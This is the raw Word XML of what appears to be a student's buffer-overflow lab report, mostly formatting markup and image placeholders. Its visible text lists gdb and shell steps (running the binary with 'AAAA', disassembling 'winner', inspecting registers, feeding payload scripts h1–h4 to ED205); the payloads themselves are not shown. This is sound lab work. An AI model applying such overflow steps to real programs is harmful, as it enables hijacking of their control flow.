    <w:p w:rsidR="00346358" w:rsidRPr="00464481" w:rsidRDefault="00346358" w:rsidP="0034635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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>b 33</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346358" w:rsidRPr="00464481" w:rsidRDefault="00346358" w:rsidP="0034635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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>run AAAA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346358" w:rsidRPr="00464481" w:rsidRDefault="00346358" w:rsidP="0034635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hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>info proc map</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00346358" w:rsidRPr="00464481" w:rsidRDefault="009C02DA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B592CA" wp14:editId="6101D6DE">
            <wp:extent cx="5943600" cy="625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2DA" w:rsidRPr="00464481" w:rsidRDefault="009C02DA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0x400629 trên hệ thống x/130x 0x804b000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C02DA" w:rsidRPr="00464481" w:rsidRDefault="009C02DA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5D4C2A" wp14:editId="12CB1500">
            <wp:extent cx="5943600" cy="62464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2DA" w:rsidRPr="00464481" w:rsidRDefault="009C02DA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t>disassemble nowinner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C02DA" w:rsidRPr="00464481" w:rsidRDefault="009C02DA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294212" wp14:editId="0C8A618D">
            <wp:extent cx="5943600" cy="6216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DE" w:rsidRPr="00464481" w:rsidRDefault="002C4EDE" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4EDE" w:rsidRPr="00464481" w:rsidRDefault="002C4EDE" w:rsidP="002C4E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nano h1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4EDE" w:rsidRPr="00464481" w:rsidRDefault="002C4EDE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F71EAA" wp14:editId="7B96A4DD">
            <wp:extent cx="5943600" cy="62699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2D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112D7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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chmod a+x h1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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./h1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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./ED205 $(./h1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4EDE" w:rsidRPr="00464481" w:rsidRDefault="002C4EDE" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4EDE" w:rsidRPr="00464481" w:rsidRDefault="002C4EDE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CD0D6C" wp14:editId="5CA597BE">
            <wp:extent cx="5943600" cy="62623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2D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="002C4E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C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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cp h1 h2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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nano h2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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gdb -q ./ED205</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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run $(./h2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00C112D7" w:rsidRDefault="00C112D7" w:rsidP="00C112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y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00C112D7" w:rsidRDefault="00C112D7" w:rsidP="00C112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112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="002C4E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C5EA4" w:rsidRPr="00464481" w:rsidRDefault="00CC5EA4" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7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201565" wp14:editId="6553FCDA">
            <wp:extent cx="4572638" cy="4801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EA4" w:rsidRPr="00464481" w:rsidRDefault="00CC5EA4" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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cp h2 h3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00C112D7" w:rsidRDefault="00C112D7" w:rsidP="00C112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nano h3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7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28CACE7" wp14:editId="78921359">
            <wp:extent cx="4553585" cy="48012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2D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7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B5F9849" wp14:editId="685E2F23">
            <wp:extent cx="4544059" cy="480127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2D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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gdb -q ./ED205</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7" w:rsidP="00C112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run $(./h3)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00C112D7" w:rsidRDefault="00C112D7" w:rsidP="00C112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info registers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C112D7" w:rsidRPr="00464481" w:rsidRDefault="00C112D7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4C5F14E" wp14:editId="7BDF5663">
            <wp:extent cx="4572638" cy="4810796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225" w:rsidRPr="00464481" w:rsidRDefault="00016225" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00464481" w:rsidRDefault="00016225" w:rsidP="000162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disassemble winner</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00464481" w:rsidRDefault="00016225" w:rsidP="000162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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00016225" w:rsidRDefault="00016225" w:rsidP="000162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y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00464481" w:rsidRDefault="00016225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70D9645" wp14:editId="2D8B807B">
            <wp:extent cx="4572638" cy="4791744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225" w:rsidRPr="00464481" w:rsidRDefault="00016225" w:rsidP="000162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cp h3 h4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00016225" w:rsidRDefault="00016225" w:rsidP="000162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44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nano h4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00464481" w:rsidRDefault="00016225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169FAB3" wp14:editId="7DA74824">
            <wp:extent cx="4553585" cy="47631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225" w:rsidRPr="00464481" w:rsidRDefault="00016225" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00016225" w:rsidRPr="00464481" w:rsidRDefault="00870D96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C512EF0" wp14:editId="24892B7D">
            <wp:extent cx="4553585" cy="48012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BFC" w:rsidRPr="00464481" w:rsidRDefault="006F65A0" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0046448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3FA460C" wp14:editId="04EDD5A7">
            <wp:extent cx="4601217" cy="480127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5A0" w:rsidRPr="00464481" w:rsidRDefault="006F65A0" w:rsidP="00613BF2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006F65A0" w:rsidRPr="004644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5CC0"/>
    <w:rsid w:val="00000D14"/>
    <w:rsid w:val="000023BE"/>
    <w:rsid w:val="00016225"/>
    <w:rsid w:val="000A4D23"/>
    <w:rsid w:val="000B20BF"/>
    <w:rsid w:val="000F55F4"/>
    <w:rsid w:val="00120EF3"/>
    <w:rsid w:val="00133BF1"/>
    <w:rsid w:val="00225C90"/>
    <w:rsid w:val="00246A0B"/>
    <w:rsid w:val="00294DB8"/>
    <w:rsid w:val="00297208"/>
    <w:rsid w:val="002C4EDE"/>
    <w:rsid w:val="00335A96"/>
    <w:rsid w:val="0034218E"/>
    <w:rsid w:val="00346358"/>
    <w:rsid w:val="0039044D"/>
    <w:rsid w:val="004438A1"/>
    <w:rsid w:val="00464481"/>
    <w:rsid w:val="00485CC0"/>
    <w:rsid w:val="004B6387"/>
    <w:rsid w:val="0051736B"/>
    <w:rsid w:val="00552BFC"/>
    <w:rsid w:val="00564D47"/>
    <w:rsid w:val="005F600A"/>
    <w:rsid w:val="00613BF2"/>
    <w:rsid w:val="00647DB5"/>
    <w:rsid w:val="006D7657"/>
    <w:rsid w:val="006F65A0"/>
    <w:rsid w:val="007A68BE"/>
    <w:rsid w:val="00835472"/>
    <w:rsid w:val="0085189E"/>
    <w:rsid w:val="00870D96"/>
    <w:rsid w:val="008C664D"/>
    <w:rsid w:val="00987392"/>
    <w:rsid w:val="009C02DA"/>
    <w:rsid w:val="00AF078D"/>
    <w:rsid w:val="00B43341"/>
    <w:rsid w:val="00B86FDE"/>
    <w:rsid w:val="00B9166A"/>
    <w:rsid w:val="00C112D7"/>
    <w:rsid w:val="00C57660"/>
    <w:rsid w:val="00CC5EA4"/>
    <w:rsid w:val="00EA6A78"/>
    <w:rsid w:val="00F71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A62C93"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{AC562704-834A-4C40-9854-4F2B73AF6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6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A4D23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F07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F078D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F078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10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3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1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9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3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0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youtu.be/oQT8L4tBcII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hyperlink" Target="https://youtu.be/uCqQMY3Nm0E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hyperlink" Target="https://youtu.be/SbwGUJa-ENU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31</Pages>
  <Words>394</Words>
  <Characters>2246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Hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hung</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-11T00:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T04:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>